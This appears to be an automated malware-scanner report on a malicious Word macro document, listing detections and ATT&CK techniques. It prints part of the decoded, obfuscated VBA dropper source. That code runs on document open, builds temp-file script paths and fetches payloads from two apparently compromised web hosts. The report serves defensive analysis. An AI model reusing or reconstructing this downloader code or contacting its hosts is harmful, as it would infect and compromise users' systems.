MALICIOUS
390
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1082 System Information Discovery
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. It uses a lure to prompt the user to enable content, which then triggers the Auto_Open macro. This macro, in turn, calls other obfuscated VBA functions that likely download and execute a second-stage payload, as indicated by the critical heuristic 'OLE_VBA_SHELL' and the ClamAV detection 'Doc.Downloader.Generic-6698421-0'. The obfuscated script attempts to construct strings for execution, suggesting a downloader or dropper functionality.
Heuristics 12
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/rights/In document text (OLE body)
- http://www.iec.chIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11918 bytes |
SHA-256: 0e25485a06e958e23d131ec577e387a7e37a4a397e623a6697b302bea7945090 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Mjqwdkklq_Open()
End Sub
Sub Ajdqljwd_Open()
End Sub
Sub Auto_Open()
Unjqwkdqwh
End Sub
Sub Unjqwkdqwh()
BQJDQW = "1j2hejk ghj21ge 21"
Sqjdklasdsj
End Sub
Sub Giqjwdhqwkjq()
NBJQJWD = "hje 12"
End Sub
Sub AutoOpen()
NJQWDQ = "12jhe 12g"
Unjqwkdqwh
End Sub
Sub Workbook_Open()
VQDWQ = "1b2hjeg"
Auto_Open
End Sub
Sub Sqjdklasdsj()
Dim fallout As Integer, silkroad As Integer, inclife As Integer
Dim hnquhdjincinc As Integer
Dim retVal As Variant, gana As Integer, incturakk As Integer, kaladd As Integer, BWBBNS As String, KOLYHDN As String
KOLYHDN = Chr(90 + 2)
ANGOLA = Ubqhwdhwqbd(13221) + ""
BWBBNS = Chr(60 + 24) & "emp"
QHDQUWH = ANGOLA
FL2 = QHDQUWH
PH2 = Module2.Goabc(BWBBNS) + KOLYHDN
silkroad = 9
jwnqdw = -1
BOSNIA = 8719723
BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
BALAGAN = BOSNIA
JWIDJIAAA = ""
QIWJDABB = "b"
HUYFEA = QIWJDABB + "a" + Chr(116)
PSFL = FL2 + Chr(40 + 6) + "ps1"
gana = TRnqjdkqSjsadSS(1 - 300 * Sin(20))
SSS = Chr(BALAGAN + 2 + gana)
VBFL = FL2 + Chr(50 - 4) + "v" & Chr(90 + 8) & "" & SSS & ""
BAFL = FL2 + Chr(TRnqjdkqSjsadSS(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
INTG = "" & "o" & "bject"
KIWD = Chr(10 + 100 + TRnqjdkqSjsadSS(CInt(Len(BAFL)))) + "dul" & "e"
AFTG = Chr(109) & KIWD
SXEE = ""
SXAA = ""
SXE = SXEE & SXAA & "" & ""
GNG = ".j" & "pg"
SXE = ".exe"
HUQD = Chr(30 + 16 + 1)
ATTH = "http" + "://"
BQHJDQ = "s" + "avep" + "ic" & Chr(46) & "s" & "u" + HUQD
PSPTH = PH2 + PSFL
VBPTH = PH2 + VBFL
BAPTH = "jb2e j12hej12ge 21"
ABPTH = PH2 + BAFL
BAPTH = ABPTH
JHQKWDQAASS = BQHJDQ
Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
DRT = 315
BFT = 316
CFT = 317
DFT = 318
EFT = 319
Dim NUWDHUQHUQWDH As String
NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
Dim PBIn As String, asdwq As String, MIWDWQ As String
TSTS = "." + "tx" + "t"
CDDD = "78672738612836" + TSTS
LNSS = "f" & "a" & "f" & "a" & "" + TSTS
STT1 = "solavite.mx/w" + "p-co" + "ntent/the" + "mes/In" + "novationSci" + "ence2/cm" + "s/l" + "ib/js/b" + "ox/"
STT2 = "cadis.sk/mo" + "dules/mo" + "d_" + "arati" + "clhess/"
PBIn = ATTH + STT1 + CDDD
CONT = Module2.Linolium(PBIn)
asdwq = Rasdas(CONT)
HQUWDAAA = "0"
If (asdwq <> "=") Then
PBIn = ATTH + STT2 + CDDD
CONT = Module2.Linolium(PBIn)
asdwq = CONT
HQUWDAAA = "1"
End If
CONT = Quqhwdbyas(asdwq)
Dim ahuywdgqy As String
DJQND = "text"
NJDSS = "stext"
TVT10 = Port(CONT, DJQND & "10")
TVT20 = Port(CONT, DJQND & "20")
TVT21 = Port(CONT, DJQND & "21")
TVT30 = Port(CONT, DJQND & "30")
TVT31 = Port(CONT, DJQND & "31")
XPT1 = Port(CONT, NJDSS & "1")
XPT2 = Port(CONT, NJDSS & "2")
XPT3 = Port(CONT, NJDSS & "3")
WVR = Module2.Goabc(NUWDHUQHUQWDH)
hufehu1 = InStr(WVR, "sers\")
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (hufehu1 <> 0) Then
ghdAdd(1) = "2"
Else
ghdAdd(2) = "3"
End If
JHWQUD = Join(ghdAdd)
hudhw = Val(JHWQUD)
Module2.Crispy (1)
MIWDWQ = ATTH + STT1 + LNSS
If (HQUWDAAA = "1") Then
MIWDWQ = ATTH + STT2 + LNSS
End If
SEXX = Module2.Linolium(MIWDWQ)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.